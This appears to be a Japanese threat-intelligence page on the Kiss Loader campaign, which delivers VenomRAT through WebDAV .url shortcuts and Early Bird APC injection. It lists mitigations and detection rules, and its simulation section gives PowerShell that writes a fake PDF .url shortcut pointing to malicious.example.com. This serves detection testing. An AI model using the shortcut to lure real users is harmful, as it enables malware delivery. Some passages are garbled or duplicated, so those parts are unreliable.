フォローする 
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
研究者 G DATA セキュリティセンター は、新たに確認されたKiss Loaderと呼ばれるローダーを調査しています。このローダーは、TryCloudflareトンネルを介して公開されたWebDAVリポジトリを指すWindowsショートカットを通じて配布されます。起動されると、このローダーはDonutで生成されたシェルコードを解読し、VenomRATやKryptikコンポーネントといったペイロードを取得し、それらをEarly Bird APCインジェクションを通じて explorer.exeに実行します。分析中、研究者はノートパッドウィンドウを介してマルウェアオペレーターとの直接的なやり取りを経験し、Early Birdインジェクション法の使用を確認しました。このケースはツールの急速な進化と、活発なマルウェアを扱う際の強力な封じ込めの必要性を強調しています。
調査
研究者は、初期のショートカットを制御されたラボで起動し、WSHスクリプト、JScriptコンポーネント、バッチファイル、およびPythonベースのローダーを通じて実行チェーンを追跡しました。彼らはDonut生成のシェルコードの使用を確認し、埋め込まれたペイロードを抽出し、APCを休止中のプロセスにキューイングする最終的なインジェクション方法を文書化しました。セッション全体を通じて、チームは実行時の詳細な出力およびマルウェアフロー内に残された開発者メッセージを捕捉しました。オペレーターとの短いリアルタイムのやり取りは、技術とローダーの活発な開発状態をさらに確認しました。 explorer.exe process. Throughout the session, the team captured detailed runtime output and developer messages left inside the malware flow. A short real-time exchange with the operator further confirmed both the technique and the loader’s active development state.
緩和策
組織は、TryCloudflareのような公開トンネリングプラットフォームを通じて配信されるWebDAVトラフィックを制限または検査し、 .url ショートカットファイルの自動実行を無効にし、ユーザーがアクセス可能なスタートアップパス内のスクリプトおよびバッチファイルに厳格な実行制御を適用すべきです。エンドポイントの防御は、Early Bird APCインジェクションの挙動を検出し、休止中のプロセスがキューイングされたAPCを受け取るのを監視すべきです。アプリケーションホワイトリストも、未知のPythonローダーやDonutベースのシェルコードをブロックするために最新の状態に保つことが重要です。
対応
Kiss Loaderの活動が検出された場合、直ちにエンドポイントを隔離し、不審なままの状態で開始された explorer.exe プロセスを終了し、フォレンジックレビューのためにメモリをキャプチャします。調査者は関連するWebDAVインフラストラクチャを特定およびブロックし、VenomRAT、Kryptik、および追加でドロップされたペイロードをホストでスキャンし、露出の可能性のある資格情報をローテンションすべきです。それからログを見直して他の侵入の試みを捜索し、すべての新たに観測されたインジケーターで検出ルールを更新すべきです。
攻撃フロー
検出
可能なSearch / Search-MS URIプロトコルハンドラーの悪用(cmdline経由)
表示
ダブル拡張子のインターネットショートカットファイルが作成されました(file_event経由)
表示
LOLBAS WScript / CScript(process_creation経由)
表示
IOCs(HashSha256)を検出:Kiss Loaderの分析中にマルウェアがリアルタイムで脅威アクターと話すとき:
表示
Explorer.exeにおけるEarly Bird APC インジェクション[Windowsプロセス作成]
表示
WebDAVショートカットファイルによる初期アクセスの試行検出[Windowsファイルイベント]
表示
シミュレーション実行
事前条件: テレメトリー&ベースラインの事前チェックが合格していること
-
攻撃ナラティブとコマンド:
制限されたアクセスしか持たない攻撃者が、横方向移動のための足場を確立したいと考えています。彼らは DKM_DE000922.pdf.url という名前の悪意あるWindowsインターネットショートカットを作成し、悪意あるWebDAV共有を指します(http://malicious.example.com/webdav/evil.pdf)。ユーザーがこのショートカットをダブルクリックすると、システムは自動的にWebDAVリソースのマウントを試み、被害者に従来のバイナリを実行せずにペイロードをダウンロードさせます。このショートカットの作成は、検出ルールに一致するファイル作成イベントを生成します。
[InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 “@powershell # ショートカットがドロップされるパス(例:ユーザーデスクトップ) $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url" # 悪意ある.urlファイルの内容がWebDAV共有を指します $maliciousContent = @"# ファイルを書き込む – このアクションは検出ルールをトリガーするはずです Set-Content -Path $maliciousPath -Value $maliciousContent -Encoding ASCII -
回帰テストスクリプト: 下記のスクリプトは、検出を引き起こすテレメトリを生成するために必要な正確な手順を再現します。
[InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 “@powershell # --------------------------------------------------------- # リグレッションテスト – WebDAV .urlファイルのためのSigmaルールをトリガー # --------------------------------------------------------- # 1. ターゲット位置を定義(現在のユーザーデスクトップ) $targetFile = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url" # 2. 悪意あるショートカットコンテンツを構築 $urlPayload = @"# 3. ショートカットを書き込む(これはFileCreateイベントを発火します) Set-Content -Path $targetFile -Value $urlPayload -Encoding ASCII Write-Host "悪意ある.urlショートカットが$targetFileに作成されました" -
クリーンアップコマンド: 検証後に悪意のあるショートカットを削除します。
powershell $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url" if (Test-Path $maliciousPath) { Remove-Item -Path $maliciousPath -Force Write-Host "悪意のあるショートカットをクリーンアップしました。" } else { Write-Host "悪意のあるショートカットが見つかりません;クリーンアップするものはありません。" }